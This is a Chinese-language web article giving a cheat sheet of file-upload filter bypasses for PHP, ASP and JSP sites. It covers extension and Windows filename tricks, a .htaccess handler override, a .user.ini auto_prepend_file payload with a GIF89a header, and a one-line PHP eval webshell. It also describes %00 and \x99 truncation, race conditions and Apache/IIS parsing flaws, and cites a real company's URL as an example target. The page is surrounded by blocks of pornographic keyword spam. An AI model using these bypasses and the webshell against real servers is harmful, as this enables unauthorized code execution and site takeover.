久久久国产一区_国产综合久久久久_欧美亚洲丝袜_成人综合国产精品

合作QQ:25496334 TG@heimao_wiki
當前位置:首頁 >> 網站漏洞 >> 漏洞檢測 >> 網站漏洞檢測:upload 上傳漏洞

網站漏洞檢測:upload 上傳漏洞

yupang 漏洞檢測 716

一.upload上傳繞過

后綴檢驗繞過

1.黑名單檢測繞過
1.)上傳文件重命名

#由于只有后綴是可控的
所以常見的后綴為php中
php2,php3,php4,php5,phtm,phtml,pht,如果是黑名單的話 果斷.htacess 和user.ini 文件傳上去看看

asp中
cer,asa,aspx,svc,ashx,asax,ascx,asmx等
jsp中
jsp,jspx,jspa,jsw,jsv,jspf,jtml
#windows環境下
1.)可嘗試大小寫繞-->因為windows下不區分大小寫導致的
2.)可嘗試 php::$DATA php.等后綴
3.)先上傳a.php:.jpg,生成空的a.php文件,在上傳a.ph<寫入文件內容
4.)如果web服務器配置了ssi,可嘗試SHTML,SHT等文件命令執行


黑名單特殊繞過的原理分析
windows特性繞過

#如 
①如果在代碼中沒有過濾掉空格類時,可以利用windows的特性php(空格)進行繞過-->即該類名字最后會被直接去除掉空格  
即無這句話$file_ext = trim($file_ext); //首尾去空
②留點繞過
原理-->windows環境中會自動去除點
即如果沒有這句話且又是黑名單檢測的話$file_name = deldot($file_name);
可以shell.php.繞過
③利用”::$DATA”處理,利用windows特性,可在后綴名中加” ::$DATA”繞過
即無這句話
$file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA


過濾次數僅有一次類繞過
常見使用于–>文件的名字仍為上傳的文件名的這種情況

原理
①如在中如果過濾了.但在中雖然經過了過濾但是只過濾了一次的這種情況
因此可以進行php..進行繞過
②雙寫類-->即將黑名單的內容替換為空這種情況
$file_name = str_ireplace($deny_ext,"", $file_name);
因此直接shell.pphphp即可繞過


2.)上傳文件不重命名

通過配置文件進行繞過
通過.htaccess–>只適用于apache服務器情況可以被解析
.htaccess的內容

SetHandler application/x-httpd-php

.user.ini–>利用配置文件更改進行導致解析(適用于php語言)

利用條件
.user.ini 利用條件如下:
①服務器腳本語言為PHP
②服務器使用CGI/FastCGI模式
③上傳目錄下要有可執行的php文件

配置內容

GIF89a                  //繞過exif_imagetype()
auto_prepend_file=a.jpg //指定在主文件之前自動解析的文件的名稱,并包含該文件,就像使用require函數調用它一樣。
auto_append_file=a.jpg  //解析后進行包含

使用方法
1.先上傳.user.ini文件

//.user.ini
GIF89a#當需要檢測文件頭時需要使用
auto_prepend_file=a.jpg#即執行前先執行這個文件,從而連接其即可達到geteshell的作用

這個文件的作用為類似于在文件前調用了require()函數
是一個php配置項
該配置項會讓php文件在執行前先包含一個指定的文件,通過這個配置項,我們就可以來隱藏自己的后門



auto_prepend_file 表示在php程序加載第一個php代碼前加載的php文件,auto_append_file 是在php代碼執行完畢后加載的文件

2.在上傳a.jpg文件構造一句話木馬 連接

GIF89a
<script language='php'> @eval($_POST['pass']);</script>

然后直接執行連接即可

3.)上傳類漏洞


如果其他文件均被解析為圖片或者其他類型

上傳index類文件可能可以被解析

如 index.php,index.jsp,index.asp類

.白名單檢測
①截取類思路

①截取原理
img_path直接拼接導致
1.)get類獲取直接拼接-->get類發送的可以直接解碼%00
如
 $img_path = $_GET['save_path']."/".rand(10, 99).date("YmdHis").".".$file_ext;
即可在save_path路徑輸出的地方控制位
shell.php%00
2.)post類獲取直接拼接-->也是采用%00截斷,不同點在于-->post類型的需要在二進制中修改
 $img_path = $_POST['save_path']."/".rand(10,99).date("YmdHis").".".$file_ext;
②條件競爭原理
如upload類
即先上傳文件后然后在進行刪除與修改
如下
因此可以不斷的intruder包然后進行獲取到
$upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允許上傳.jpg|.png|.gif類型文件!";
            unlink($upload_file);


uplaod-labs思路

data:image/jpeg上傳時繞過方法#即更改為image/php的思路代


②常見利用中間組件和編輯器漏洞思路去繞過

1.)文件包含漏洞+解析漏洞組合拳


1.)apache解析漏洞

test.php.xxx

#因為xxx不能不解析,所以直接向左解析一步,直接解析為test.php

2.)IIS解析漏洞

即會將jpg解析為php類

1.)apache解析漏洞
如
test.php.xxx
#因為xxx不能不解析,所以直接向左解析一步,直接解析為test.php
2.)IIS解析漏洞
即會將jpg解析為php類

如(即編輯器處典型配合解析漏洞)

利用–>即直接代shell即可

http://www.sinochemjiangsu.com/uploads/2016/20160629095935xxxx.asp;.jpg

2.)請求頭部過濾



繞過方法:更改一個為大寫字母即可

3.)upload+任意文件刪除組合拳

①在后臺允許上傳的文件中,添加自己想要的文件格式


②如果.htaccess限制了訪問規則

找到一個任意文件刪除的漏洞

刪除.htaccess即可繞過訪問規則


3.截斷利用繞過

造成原因:作為底層的語言一個函數出問題導致

\00截斷利用–>php版本類型最多(且目錄解析類型最多)–>核心低版本服務器的解析問題造成的漏洞

使用條件:

php版本的情況
1.php版本小于5.3.4
2magic_quotes_gpc為off狀態–>如果開啟了則%00為被反斜杠轉義掉

3get請求類型與post請求類型不同所需要更改的不同


原因:

get類型-->url可以直接進行編碼將%00變成一個非正常符號的編碼

post類型-->url不進行直接編碼,因此必須更改hex的值才可以進行-->或者進行url編碼代繞


%00截斷的原理

yjhjd.php%00.jpg#即\0即為%0

即直接利用代截斷后面的內容實現繞過–>常見目錄名截取


因為合取的是讓road直接連接后面上傳的文件

所以在這里構造%00進行截取掉后面的內容,從而實現繞過

java版本
使用條件
jdk8<jdk版本


JDK版本范圍:JDK<1.7.40,單是JDK7于2011年07月28日發布至2013年09月10日發表Java SE 7 Update 40這兩年多期間受影響的就有16個版本,值得注意的是JDK1.6雖然JDK7修復之后發布了數十個版本,但是并沒有任何一個版本修復過這個問題,而JDK8發布時間在JDK7修復以后所以并不受此漏洞影響。

1

\x99截斷利用


x.php\x99.jpg #即可以進行截取了



協助本站SEO優化一下,謝謝!
關鍵詞不能為空

免責聲明

資料匯總于網絡,如有侵權 聯系站長刪除 http://m.790079.com

同類推薦

發表評論

訪客

◎歡迎參與討論,請在這里發表您的看法和觀點。
久久久国产一区_国产综合久久久久_欧美亚洲丝袜_成人综合国产精品
久久国产精品免费视频 | 一本色道久久88亚洲精品综合 | 中文字幕在线亚洲三区| 懂色中文一区二区三区在线视频| 色综合久久久久无码专区| 欧美韩国日本在线| 国产伦精品一区二区三区四区视频 | 女女同性女同一区二区三区91| 国产一区二区中文字幕免费看| 国产精品一区二区三区观看 | 久久综合九色99| 久久激情视频免费观看| 一区二区三区日韩视频| 青青青免费在线| 国产精品一二区| 国产精品视频在线观看| 亚洲精品高清国产一线久久| 欧美不卡在线播放| 国产精品999999| 久久躁狠狠躁夜夜爽| 无码人妻h动漫| 欧美综合在线观看视频| 99国产在线视频| 久久艳片www.17c.com| 最新中文字幕久久| 欧美诱惑福利视频| 91精品啪aⅴ在线观看国产| 日韩中文有码在线视频| 亚洲伊人久久综合| 精品一区二区日本| 久草视频国产在线| 午夜欧美大片免费观看| 国模精品娜娜一二三区| 久久久久久中文| 亚洲人久久久| 国产视频一区二区不卡| 日韩最新av在线| 亚洲免费视频一区| 国产欧美一区二区三区久久| 久久观看最新视频| 亚洲综合日韩中文字幕v在线| 男人天堂a在线| 8090成年在线看片午夜| 九九热r在线视频精品| 欧美成人第一区| 精品国产欧美成人夜夜嗨| 欧美一区二区激情| 91高潮在线观看| 亚洲在线观看视频网站| 国内自拍欧美激情| 久久久99久久精品女同性| 日韩日韩日韩日韩日韩| 91av免费观看91av精品在线| 亚洲综合中文字幕在线观看| 欧美性受xxxx黑人猛交88| 久久精品国产第一区二区三区最新章节 | 日本免费一级视频| 97人人模人人爽视频一区二区| 久久99久久99精品中文字幕| 黄网站欧美内射| 久久激情视频免费观看| 欧美一区在线直播| 国产精品视频免费观看www| 日韩精品一区在线视频| 久久久久久久久久福利| 午夜视频久久久| 91精品国产99| 日韩av大片免费看| 国产厕所精品在线观看| 日韩亚洲在线视频| www.欧美三级电影.com| 欧美久久久久久| 国产精品久久电影观看| 精品一区2区三区| 免费99精品国产自在在线| 成人精品视频99在线观看免费| 在线观看一区欧美| 97国产在线播放| 精品国产中文字幕| 国产精品自拍合集| 岳毛多又紧做起爽| 97久久伊人激情网| 日本一区二区三区四区高清视频| 国模吧一区二区三区| 久久国产精品久久国产精品| 国产成人在线一区| 国产精品自拍小视频| 欧美日韩高清在线一区| 中文字幕中文字幕在线中一区高清| 日韩在线一区二区三区免费视频| 国产片侵犯亲女视频播放| 日产精品高清视频免费| 九色精品美女在线| zzjj国产精品一区二区| 99免费视频观看| 精品人妻一区二区三区四区在线| 中文字幕一区二区三区在线乱码| 国产成人精品视频在线观看| 91久久伊人青青碰碰婷婷| 欧美成人综合一区| 日韩资源av在线| 一区二区三区国| 久久综合久久美利坚合众国| 色妞在线综合亚洲欧美| 91免费版看片| 国产日本一区二区三区| 欧美亚洲另类在线一区二区三区| 亚洲v国产v在线观看| 精品免费二区三区三区高中清不卡| 久久久久综合一区二区三区| 国产精品一区二区三区精品| 精品欧美一区二区三区久久久 | 91精品国产综合久久久久久蜜臀| 国产中文字幕91| 欧美视频第一区| 日本一区二区在线免费播放| 亚洲欧美日韩精品综合在线观看 | 不卡视频一区二区| 欧美高清一区二区| 日韩激情视频一区二区| 色综合久久88色综合天天提莫| 欧美激情视频一区二区| 国产精品极品尤物在线观看| 国产精品嫩草视频| 久久精彩免费视频| 久久久久久国产精品一区| 国产成人综合精品| 久久精品国产美女| 国产不卡在线观看| 久久久久亚洲精品国产| 久久99精品国产一区二区三区| 久久婷婷开心| 国产国产精品人在线视| 97国产在线播放| 91精品国产综合久久男男| 91久久久久久久久久久久久| 国产精品午夜av在线| 不卡视频一区二区三区| 成人免费在线网| 俄罗斯精品一区二区三区| 国产精品一区二区久久久久| 国产精品羞羞答答| 97免费高清电视剧观看| 91av网站在线播放| 久久久久久久午夜| 国产成人精品av| 色噜噜狠狠狠综合曰曰曰88av| 精品国产欧美成人夜夜嗨| 久久精品国产第一区二区三区最新章节| 久久久福利视频| 久久久久免费看黄a片app| 久久精品视频在线| 国产精品久久久久免费a∨大胸| 欧美成人精品在线| 久久久久久国产精品久久| 一区二区三区观看| 春色成人在线视频| 日本免费高清一区二区| 欧美国产视频一区| 国产伦理久久久| 国产福利一区视频| 国产精品免费在线播放| 在线视频不卡一区二区三区| 亚洲综合国产精品| 日本不卡视频在线播放| 免费在线观看一区二区| 国产免费观看久久黄| 久久综合九色综合网站| 国产精品日韩在线一区| 欧美激情综合色| 日韩免费观看网站| 国产在线精品一区二区中文| 99国产高清| 久久久久www| 宅男在线精品国产免费观看| 日韩国产欧美一区| 国产精品专区一| 精品国产一区二区三区久久狼黑人| 精品久久久久久无码国产| 日本国产一区二区三区| 国产日韩欧美影视| 久久久久久www| 欧美乱大交xxxxx| 日韩欧美亚洲天堂| 成人av网站观看| 国产精品区一区| 熟女视频一区二区三区| 国产又黄又爽免费视频| 国产成人精品久久| 久久久久国产精品一区| 热草久综合在线| 成 年 人 黄 色 大 片大 全| www.久久色.com| 一区二区三区四区免费视频| 欧美成ee人免费视频| 国产福利视频一区| 中文字幕在线乱| 蜜桃免费区二区三区| 久久久久久综合网天天| 国产欧美精品日韩|